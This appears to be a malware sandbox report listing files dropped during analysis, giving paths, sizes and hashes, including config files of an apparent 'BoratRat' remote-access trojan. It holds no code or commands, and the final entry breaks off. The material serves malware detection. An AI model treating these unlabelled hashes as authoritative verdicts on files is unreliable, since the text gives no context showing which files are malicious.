SHA25642791e592b95ca9129142bda4a6d15579853620f7f2c1da8f5f89d96d3fde5f4
SHA5125137be41cb622f0c2326b2afdc2e2d7608d2a42e928ff0f18d77a4fb6808fbfc352769a6babf514cd20395b0fb45761cf4e6c88c59c69305fcc946c6a4fe64d4
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\0991MIZCPJ_50
Filesize128KB
MD50c6f1b8b516330394926e98e83dc87a9
SHA135992011b96a4ccb646089a31106af9b0ce045cd
SHA256a2b53094f4ca3d47dad4e8fd7cd1f3ff388b0f1a0dbf040ac74233e2f788da8e
SHA5127ffb3661c3ffc91132c1ff91376af983de46de1d731db18f41ee5a7edd0fff5c292c8c32e8e4b3aa4c0b014ff93e192172aedad35e79ac33fc18ca5bd1647d78
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\0AGOS2C7IK_19
Filesize880B
MD539651aaab696559a7292fc1ae0241ce0
SHA1dbb30b9e825d9c63cde6efc00ecef10578f2da65
SHA2565ee41e7b53eefbefb191b78cd9d94abae14408f05319f059361efef178111184
SHA51201a9b2bbb6286b3e796e39582b4c93d811fec6f4ddbfd3f43263b00efe8fbdf96a5a4540d0901ddcdc17cbf5438f48e6433f0ec075b94de99c0b0ad2056ea01e
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\0IHE3OVZM3_43
Filesize10KB
MD527240fad9b2729901b66d3ec8fdf8bab
SHA115c7853aa2980ac19d1929e8d63a4d5bf4335ce2
SHA25638140843a1a093f55e7f1500fbc02344f336138f0391c890d0c7f5bdde994b16
SHA512c6c6349962c11daf424b9da2bc7a195a53980b83a93bc7b77d2710799c1bc55bb5a807cdb538a58d6b45fe391f887689df4a18dda4b50c84e3c0e693eaab5dfa
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\0L9KTMHKPK_71
Filesize456KB
MD57d7d505ca7041d486e23ee03c31d1c1f
SHA17ffdb4c92f2b1cda059016d7ceae39457f83512a
SHA25673207a9b625f404d4f286843fb51bdb8aadfcce23d8024f0e8cf7076a58e7c7b
SHA512ad9e997ba71589135171363820fe565d9fb25b4294d52fee4990180610fdd8cfdf56d477ee29e6490df1189166436f9a3fde258d2ea6f9b1b024e2bc45a7678e
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\169P9AUAH5_57
Filesize62KB
MD59e189d837f058b4b1f590629bce14494
SHA147dffb8d692993776873335ee27206783764f59a
SHA2563c49548aa77c6319d6327124e6c5238fcda4eb271a3a0bd5ed47df2b58f1de81
SHA5128f23ae861c54bb7d159cac7a818e5cfab000706709bcb080ce76dd5bdb4d112988d5dcec259fd2f5780ca7382f5e1b98c10534b8b0e09dbd2761da574e0d6ed2
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\1DH2WTAJAG_20
Filesize271KB
MD5f4f7777c84fef35a649bb1a5ec0d75e4
SHA1d62e4d2f48d52e94c0b0287809f186d0d66b09a0
SHA2561d7a32ec64954d55afc4560a8725d1ee19930760ad98f31e6b0401f7713d0704
SHA512eb7ac220ad6ca67dd8958d8af1f55e0e5caccb3e192759ba2a0386430cad567d145577b3b4c428d715d6e9a61eceae18795ad2402edb8d8f56e4f1b90d6d12b8
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\1YUAUGJ4EB_29
Filesize36KB
MD55f89355ec85e48c34836906500491d28
SHA1d0e15eb71ef372f71d2f3bc425b494bcca46c203
SHA256054a323d344d6878ca1fd164607d8478f42b3fffd631d779119eab7e8868b6a7
SHA512d48da9699d3efffbfc79ec1b1bf00309465b4317db4e237e6c093a700aabaca9af4f30e55dfe4bbcfd70fcec85cd0ebbdaa8cc65c907b80f8bbd7b185c5a48f1
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\3FY1YJKDGA_60
Filesize2KB
MD5f895ed206aa5c0358b74c4b85b02c114
SHA119d33664fe4df4dfd7a18b987d4472c9c3cb3135
SHA2564e9795a21fb7848a380dd341a8cb9c4097fad6514706802f1deb437fd54d45cc
SHA512bbfc8eee3bb9d2e1c60ce91f508b746c2f3d4bfb067ed6de04569cd3c57d860d559083b2ed5c5ed2dbc463cfab018d4f5c78b0ccedff42a2f70d6c238d994d28
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\4561C2MF3S_21
Filesize1KB
MD55f53b2342accd9753c0cafd70db12f5a
SHA1cd5b637e3444755a6b514481f1e01eb133bdd341
SHA256e8c8cdf46edb072d3a0532361d6f771a690b9a4abfff68fa04396e1e6eb15f4a
SHA512aa995bbe4afe9f9b86e117095c35809cb359beb035679de30db311d5e53a0d043dfa11b14ef1d8df213f28aa42aa5dc15be1887ad26374433ab347c006ed23b3
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\4RH6J0Y5GX_64
Filesize43KB
MD575460066fe2c58bc6d68d22001d12be2
SHA134770a870d8ed7949926620dde04d533e20f5f07
SHA256c5c4dea3cacc925141ae1e51cd0580f61c946619336c7f1d15960ad561278118
SHA512fb664e312c021a1a59c544371a4a9c9c89a77192cbf8d1d51e1dd9413e237d54834fea3361c1429c3b3b4823bb57530d1bdcecbb3bbfe3817c207002f366baa6
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\569T4H8YLF_58
Filesize960B
MD5354b69f5c0388ef2c62c9c6c9a7ef598
SHA131f23d9abc13e0c28a582e1639c6f8f853978987
SHA2561261855677f1f2dd6db9bfeff1ee9a60edff916bae34a76f78fba6ecde436951
SHA512afa34dc718d83f00df0d8cd8f3c68e79d84dd846e7fd130f3044c7049adfd5592fea9d569ddb41a70be4f787d069d780778d013edaba22659417f0f539c22591
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\5PM6ULXH3Y_72
Filesize165KB
MD563055b983f336cf355c40a2caea26e3b
SHA1f264b248d74d413b0780d79eae2321c521eff899
SHA2563fe036a58b919cf3cdb2d12f89f7e79b8f397c11f4f6b314657da16a2ba1839c
SHA51233d674f14ae73a148598a15449ef152837586da784edea409bb85ef201f167a7150e50916cfb7d88ba7d721b7049b73bc1355a875a4db9ffdfdb4b1d26a66d90
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\641CU7BN97_74
Filesize2KB
MD54828013b9af6cecdeea1bef5c3d596a5
SHA1e1a66f24097af3a55883039ab2ff8b45759e88ba
SHA25693a5e7b5231d413935cda09c7befa123a8922bfb129a95f236f472e26789b3a2
SHA512e5ab2e6c1368195d842b5da108022c51f1131b059064c3e3e994c274c95de822d413f6a5d527a83efe4633c637c3dad0ebe032e3a47d5e80c51abd196940b189
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\6KQQAUKDEX_35
Filesize96KB
MD567f8898928664135a1240484ec017468
SHA1e8ea398cdf66a688e445704b4935f703633a1643
SHA256b36b551149f14367f19482d142e606e4d3034509e5bb605ef14eaa084bd32158
SHA5121691a6b9dffcf05fa85dbbe8d982ed492dfb15d7c969bb445aff3ee636dc621398c158249c31192c5640eff940ea343249839d1ec10b9d8bded1d437d6f0b9d7
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\6SQTY03HKY_82
Filesize1.9MB
MD5689277a7b021c53be612eca741f83b3f
SHA1cc2719b4d8f3b3704e9d27dcfbc9aa47ca109cea
SHA2562b33f45a25c2a9798fa9f7ca77065070f5b3a7bf5d6356d0e3a3af4a0d8d9f5b
SHA5126eec6d4c4a202eadf97f0b05d7fd62c820dd92e477a9440e6dde00427c135a5daacf6e52edcd7956bb8bb9c5195678cb40cc3ffdc09085bdba43464eca599bb8
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\73DSD5R51P_36
Filesize17KB
MD5afb0299b149134969d4ee848ef88a1ed
SHA16cbcc47dc989a22ca246fb61ece94972f8fdc1e3
SHA256c74234adc1e16bae35ef6c057f4a829ba3079b5f105f6e047a985baabbc3a7fc
SHA512874631a0299cae1b94426139a2ed3b2d13a5fce92816678c19a6e5b92740b8804e9df25caf81d8b11454b457ced59c05bb471ab66f097ff81548cd2dea0070a3
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\76DZCHCILL_23
Filesize120KB
MD54cba435e616dc2699888d95c964e5faa
SHA1fc906ca3f5313189d34aabee0f2bba5ea3c51b90
SHA256d2a9c6acf03bf752c437ae7dd0d77fa35f1a0b2065b0a85c70344820babe61a4
SHA512fcf314e4d825693155efe92414f685ee271cd03d2b52b8105195fcecd16126795e55c22af9d731249ca5a25f41de88108644d1c7b922306a5ca4f21891b2f5fc
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\AH3EESUM2R_40
Filesize11KB
MD5a2320e55c180105078d03a6ac4821f0c
SHA12d5b41d99a612c172559d3ae4b6a62eb57278e4e
SHA256836ee87978ce7e6cb8a7a914af49f4130756d18281653b7e483af059e39d1587
SHA512642b49dd2853686003d3892ba064a3adb75f867aa84b798aa996828676bda038ae03a21522542923abfbfefce8aff1843fe6502bc3222831c4f487ec6fa4a82b
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\AQQH41CUR5_22
Filesize127KB
MD5995356d541ee88a8e0f08ee3798d5ff1
SHA193bde5bbc77cdfe1a604d5b71a9a48392260b27d
SHA2560debb489cb1dd5158d1d7ffe9264ecd2bbb777ff114c6d1b6b00e1ecea155050
SHA5124b165123528e694b0322189206564b97e3c49e8445f226026488275ab5a6b2a14a79246995d8f5256548d196f781de846b5073e9094e683ef237221c67e46499
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\CYVIPXLISZ_68
Filesize496B
MD51c30f9f87f1b68c98ba3179ceda7d065
SHA1ad9ef3bd621af5c30c13ce5232c4f9a32fadf6f3
SHA25617bc93e23a3587fa9e9835e45146ce9a359d6bc72fa873206c3e09b03d576fe1
SHA51247e84fc5fcb43f333f5252b6f73910f72e66fb30381d839162f1cca4de97030b5606d32b8cb73dce6d05957e7bd355e996a06a69ac04f0e067bdeb5f432ad298
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\D9CYK0WE3M_25
Filesize1KB
MD5f7f6a4399e70189a744a50b980ab66a7
SHA17ee1df983292ef7965a382a470f5b0b8e4c18c06
SHA2560459fb13950110bd8ed1d2b30d1880f6d539e308a18d6642350fe6d6b5a3c39c
SHA51213569c0f56eb52d544348400bab172f3efed17cadcf06e094222a426175bd5cc0309984b1f1a6bc4ec22bc6f9ba18b2bac783b71bf192eb9e2c926d85d6d4c07
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\DGCD1U241E_11
Filesize123KB
MD53facec5b1ede82c5c1a35df14fabc57f
SHA1cc39a67d2e4804ebcd1697e149f6ab05eb2d4eb0
SHA25624ed5fd733693213478c4e2b98827adfb3083a41bacd05fda3923610b272a74f
SHA512966d053e97f2c823c854d8adedeef82ef7986cef109451bb170dfa208c5241c3f52e80f086e103beed6423d10c9907cb5fb334dfb3fb799e45b5c3ad2b2d671a
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\DQ518A0D1V_61
Filesize44KB
MD585a1138fd6603081462cf03b1506b155
SHA1576ff47fb7291cbd386dea0bf70a1f69cbf04070
SHA256f40cb06197600fb7feec1fa11ed872efe8ea2bd7d679fe8a3e7d7a63f5b7a86e
SHA5121ff6a0fc0142ae9301b915cbe16ba2eb891f9faaa8ae24621a53fc8634a7849e7f8235bde6d3feabb4b64ed86c06ccffafb434e98c94b13b910a3518a0299aab
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\EEDKR24BYJ_16
Filesize20KB
MD581884ca53fc1d909634283a60c5e4ab2
SHA1c2e6281447b36d2678a48b04edf6d16d63483a79
SHA2562ad44cf3f08f969763240ad26ee4eb083ad87886b2df382a50e6e1f42c32a2d5
SHA5120bb98370f42193730c3b44d2d2adbe4e3753959c29860c793093371d4ed7e7b3bb95a2236a596bb290b3c8ad62aaccb644314e3fac16830d39b1a477f858e8a6
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\F0YUJBZ0WA_44
Filesize73KB
MD567064b895c55c6e9e79213e2d80610c6
SHA1de585f03127b18b01bf4d2f4335e67eb50f2d3f4
SHA256eb1935ea324499b3d3ec062e0ab221fd97c1e9421da2adc9a49ce87489373039
SHA5129b9ab5c82cf71b9c3a39602346ee1fe1f984bc7f960a8f812920c1d6a99632c4c8cacc1d8e5293bb70ee38cc7a73789f7e3e5b023552a4ed1cb314842783951e
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\GKOL1G8OER_18
Filesize8KB
MD59a8cd5e0d0182ccfeeb78688f7f889eb
SHA179da07fdc214960cf707ee1ece5b16da6ec31e5f
SHA256775eca9bcb25cc74021852a0725d893910afb4f53ccf137fb227157a550205ce
SHA51278d775f1a499398dd3f17c48ed795e801f7286cc96944cc5a916ba68879c2460a91da4150a3b6eb1b058af98b5a27db7987692c5acd9c4550d35a01b68fb52b6
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JAU7ICDTJN_49
Filesize1KB
MD50128b9d256051cf80eb6f56655532b18
SHA1f13f2d438cbe3a44db721ca234dc364ae5cf531d
SHA2563e4c2abb12ac5c8ab8363571e93bc96d7a61a689671217c746b807d617b38344
SHA512fa9122d4401391deb3a8f0f218e4636cf4336636aa8ae3db93a869ac45a292dae8f6d6f6b579f8789ef015f4dd49b10a86ebe0c1d2e35022163cc2c42c220363
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JGFH8Q2XRI_51
Filesize15KB
MD5d7fe52dbf80d2a20df09b1616e6b49de
SHA1bd9998d261f36392ff44ba9eee6d49c478c20947
SHA2569055aaba192530bef8bbb295578b41fb2af4e1702a3e5dfa86e78b5dbfa021b5
SHA512809540bd4b5b9ef3f5fabe3eca63c34bb9202714d2f7b85ee45b3630b55519f11466424b9ac3b53e937298aa7537222d8e2830a77f252f35458b7179ad047e0a
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JN6Z5HCX2U_83
Filesize360KB
MD5f9a8f4328f88ec9ad2f12491ab5f02fc
SHA1911d6e094353863040c453f7f84daa89e85f0cdf
SHA256dead48aafac4fdb569f1b1cc938bb6d2f870f712e48c4227a6e2fd45f15b86fe
SHA51252f72cb9e8f640f8ba2fad99c2f5f1b1a141739ef8883a6a2790d49d84dc20e41f75f870ee3a18ca35b611c410cdb68115dd074b5ef682e11fdeee9b21610a20
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JSYMTVSF9I_77
Filesize16B
MD560eec067c8876a415da67e2f03fce016
SHA1db862665cceaea996b99b8245ac9120ea16fa53c
SHA2567f5922c92cd33fe756cd7eb412f2208f1663fd88a9953ea2b1dc35f60b873a39
SHA512405ee1257a4b04027daedf63e5a23a77c8271ff53c27aacc568b375c0f033cba11129abf46b14a83c8ea14b9b59a830e5385646de9c587a45ea2c7ea17fd2d58
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\KZAZAG2SF8_30
Filesize128B
MD5c96c3a0146553be48365c73fac0bdab5
SHA187510f75da8c7b8f45e26f89d7003df033860e52
SHA256205945a5e8333ea89d180d85cefdc7115aadce40ba4d6351854333fe8a199cf1
SHA512bac0a5e13ec5271259ca1b39c2d65ef8a604df5c991c8d99ac68dadfc9c7b5befcef8a4459529989f1a6cc03436b4e15bf419744497c0af530d193ae501c7826
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\NRWHTGV6H5_26
Filesize1KB
MD51dd2f6de421873901d38873a45ad6a18
SHA13ded2ebca8b981701ae2fcb35dca02aef8cd1e27
SHA2564af496345ba17d7584db68085d0783114aa8d849c7052df4c8a5281d41d33f19
SHA512a27eb4737d06250661dbb7491ea113f3266294438fcdd5c30c65d1f9e4277a81857f72c75515a0a04c156dd43c985bf6548b32b970fb30abcbac15b682b0fb90
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\P37BVKJFKB_27
Filesize2KB
MD53be9e8907b2607e6373320fdc5df4434
SHA11e94d57ba7f4d651bfb5242153bd08410afd9b00
SHA256ce5ed73abb70ad88389bcb37f78c13819ab3ef9b275f8fef78fac3a46a2216d1
SHA51275c7c315bfde989573f7bf0c69f4ebdbfc484dd8501d58fe8cd9f028d31d63337e92f2ceb495e8669e0d60ea7e0ffa0d838458efad71e7b97be22a51a9c52715
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\PRXGEA1WGI_10
Filesize14KB
MD58be9928e503e0f93614896a73ab8d23e
SHA1c2f350c96bf343c86fd056199e5b2faa0d93dbed
SHA256d4e417b7da9e5bc434b1067dbaa903fbca9b20b42f09cba808cf70d9b569f867
SHA512da08e603ba0d2bf1ae0866b96716ada612f6b321e8d1032f13ab450e57d984b9189f55bf5c8aa7a941287f3a25f2fd993a0bd0c92da605215e33a2687eb8ed17
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\Q3QXXREDJL_53
Filesize102KB
MD5a69402a91297d07c38fa6852709e073f
SHA113673232125e116038532c515ea3e3d86c212c49
SHA256eb57004a4cd250962d965a0c8261fe4dcb1720348b540aa3ce9dc920c5e2629d
SHA5120ebf5369a85b4d6736a10f6a288ac6c872681b2e092b21eb3db38901661948c40d080eedc331ba00c2cfb0263cdf2998a917fbfe18d52e9fc3ae37bb32412430
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\TGAP7LYUU2_85
Filesize1KB
MD5971787f7730a9241f125f55483a61aac
SHA1dc67125dd253b9a386a69a65aa34028a60342dd9
SHA256dcaa4bf51977b03ebfe1b86f59c45f16718f60dcf65d99d4f8ef0ba05593c6f5
SHA512560a4dfc95f971d9f278ca6eeef9bc4f7717ce42e9ac2a7f8beae320cd46d3f4868eef3ca8ae29f90b1d4b15932a2f8f163aec4abf3bfcc07d5c02fd1cebdd1e
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{4f0e67c9-da3b-4330-9bd0-cbaa1891c14f}\0.1.filtertrie.intermediate.txt
Filesize16B
MD533223e636bdbf373ec6e9bd340683603
SHA15782664267e633f93eb2b64d98b87d9ebbced001
SHA256fabfc6577098bdd4ab1b9be27afac35f2e1c0617d7232ad2158d4bb6b905ce46
SHA512a2a7230d2cb5430a6d18316548d6b790b499a966dd97a360800510f40cd6fa678f8932550b26c05890e4c3564a1179e6fa3d8be6a6451c249776721e08862a74
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{4f0e67c9-da3b-4330-9bd0-cbaa1891c14f}\0.2.filtertrie.intermediate.txt
Filesize16B
MD553e46bf98975ee755ea813a3c4dcb9ff
SHA1b940282c660017809856ab5d83a4dbd4dd3770a8
SHA25609d87f64047107711aac984fecc12f7974a00af85edbd3153cc67a0fd25a3395
SHA5122dc530b2c3ff1f1af7079f9bad33f97f0da1e9bfe0836ba17657754ef4e892e3471d322f9c1cd1beceab8f36eb128efdd0bd5474f2f4be9ecd03fac2d7488550
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize2KB
MD5ea872f4a99058e9bd5ced3468da82a68
SHA1f4a2d8b360f9ed999601b108034e2aeab0046e98
SHA256284d703b04635c777fd2e1c7b75ea0166b633ffdfac6eb8fcbacfda122999aca
SHA5125537bbee92b48856197cea5fd6b4dc7c9abd09fd074ac848625b5dcef0326dc9a97ce4a81e4c3bafcb4ef8bcb6690de5a05063f933f04379fc22edebf0565e0d
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize3KB
MD59a32be1451abc639065e9bb7f7695ff7
SHA165a4401dd714cde67d4a0feedf12901ce5ccdde8
SHA25689c2b8a03fb43cd0f1f40f260a1de97c9bb4b648d976474bf80a9808c3063580
SHA512363e87a13de0b2bf1d5b60d17c6767670ac6431580052070c602b2a850e61efa36dde40700281c2cb6d41ce054aec267007eecab66eb09c8a21bf1440032f806
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt
Filesize846KB
MD5766f5efd9efca73b6dfd0fb3d648639f
SHA171928a29c3affb9715d92542ef4cf3472e7931fe
SHA2569111e9a5093f97e15510bf3d3dc36fd4a736981215f79540454ce86893993fdc
SHA5121d4bb423d9cc9037f6974a389ff304e5b9fbd4bfd013a09d4ceeff3fd2a87ad81fe84b2ee880023984978391daf11540f353d391f35a4236b241ccced13a3434
-
C:\Users\Admin\AppData\Local\Server\BoratRat.exe_Url_lrgptkwgygy0ckkeksopg3divcheuvku\1.0.7.0\user.config
Filesize309B
MD50c6e4f57ebaba0cc4acfc8bb65c589f8
SHA18c021c2371b87f2570d226b419c64c3102b8d434
SHA256a9539ba4eae9035b2ff715f0e755aa772b499d72ccab23af2bf5a2dc2bcfa41c
SHA512c6b877ff887d029e29bf35f53006b8c84704f73b74c616bf97696d06c6ef237dff85269bdf8dfb432457b031dd52410e2b883fd86c3f54b09f0a072a689a08c0
-
C:\Users\Admin\AppData\Local\Server\BoratRat.exe_Url_lrgptkwgygy0ckkeksopg3divcheuvku\1.0.7.0\user.config
Filesize580B
MD5acb6df8bd0fe9236ea87ea6e3c28173f
SHA18b1d88bd749b58905c6db258e7224a67d1179938
SHA256ec2b3fc4d011e9b8a04188d8f2ff280de854dde7d6ebf8e871e0642f789dfa5b
SHA512a4222c0f5aeba58679c21361dcb6ab2c7ed1d9cae41d2839089fdb7bbaac3b8735afff8b302557f85389daa977b826cee77b944ba598e3fa6c2a16781453a832
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
20.0MB
MD565b694d69d327efe28fcbce125401e96
SHA1049d4d71742b99a598c074458f1f2d5b0119e912
SHA256de60ecbbfef30c93fe8875ef69b358b20076d1f969fc3d21ab44d59dc9ef7cab
SHA5127ab57642e414e134e851d9aa2ed3ef8b483f3a5f77877cdc04e08d7f95c44884f8ccc6beaf8ba7f6949cfd7398c46be46c024d4fdeacd3a332d4565609baad5b
-
Filesize
5KB
MD53e645ccca1c44a00210924a3b0780955
SHA15d8e8115489ac505c1d10fdd64e494e512dba793
SHA256f29e697efd7c5ecb928c0310ea832325bf6518786c8e1585e1b85cdc8701602f
SHA512ea7e3a6e476345870f05124a56dde266e1ad04b557b2dde83c5674cfdf3be00f26d3db6a14a8d88ecf75e2c9e3a12e6955f6c85654ba967c17664e9acc3d4f1f
-
Filesize
56KB
MD585177d29b7da7cb2c5d45a63705cbf75
SHA1096a6622cab5be82bac79efecafb22618809bc10
SHA2566cfc9e4a6192301441cee5a2c6433d61eaf7dab765365364092e0e4830570e7f
SHA5125e3c800e3ad305a1cc5771230c822478d81fa94f2354b000bb38e3c3768f50eab0cd217eed1672d6e5c81f399b9713569c18af8541ff9109c7b269a178e2d0f5
-
Filesize
1KB
MD5478ee44a47895e687296b9ab34df04c4
SHA14b81e94f3d3a99cc01d5c57bd5bec8317f0aca4f
SHA2564b0612b2cd5e7ecc456d5c29c89917b8ec881c5f4fd94afe157098ca96308781
SHA51228c0635f1e5062fcdef783aceaa8aa53531f18ce66d4aed62a99ec5b31a364e0d0d36fa237d978d75f51a859a7140d31e62aed340eae4aa769e02d1640e30c7b
-
Filesize
23KB
MD59726d7fe49c8ba43845ad8e5e2802bb8
SHA18bcdf790826a2ac7adfc1e8b214e8de43e086b97
SHA256df31a70ceb0c481646eeaf94189242200fafd3df92f8b3ec97c0d0670f0e2259
SHA512f97bc1e2ecbbc979d0eea3559c2da0982e4617eb217603224263ef825b8d98b3c52392eeef41888e6295fb60d362f9521e2f2bdaccc762c4591565f9e6248658
-
Filesize
24KB
MD57ee673594bbb20f65448aab05f1361d0
SHA12a29736882439ef4c9088913e7905c0408cb2443
SHA2568fa7634b7dca1a451cf8940429be6ad2440821ed04d5d70b6e727e5968e0b5f6
SHA512f5d8457279a5c0684c075eae2d3de62b672303520a1c725b4f97787961e6043c73ca68d4353e5d4168a427104be65b74a9c92a87419348e92d772368e94fab7c
-
Filesize
31KB
MD562c231bafa469ab04f090fcb4475d360
SHA182dda56bc59ac7db05eddbe4bcf0fe9323e32073
SHA2566a4f32b0228092ce68e8448c6f4b74b4c654f40fb2d462c1d6bbd4b4ef09053d
SHA512515fbdc9e792bd7ab711261c1d0185351079a2d5b104211c559cfc4c8465794ef897c43f0f825b4fc2e97a56525f73c3ad0a28de0fcf8b8bff89c26d1c97b3cc
-
Filesize
32KB
MD54ccd3dfb14ffdddfa598d1096f0190ea
SHA1c68c30355599461aca7205a7cbdb3bb1830d59c8
SHA2567f8a306826fcb0ee985a2b6d874c805f7f9b2062a1123ea4bb7f1eba90fc1b81
SHA5122fa3ea13054d84e1a307ddc63f2a364c760b8e1882fee975585e6e1bae41cad3463495d22d0c8fb77d40e6b0336c3537ab68efb5fd84e46063a336ba20672cbc
-
Filesize
277KB
MD50b7c33c5739903ba4f4b78c446773528
SHA1b58555bebddf8e695880014d34a863a647da547e
SHA2562d9625f41793f62bfe32c10b2d5e05668e321bcaf8b73414b3c31ef677b9bff4
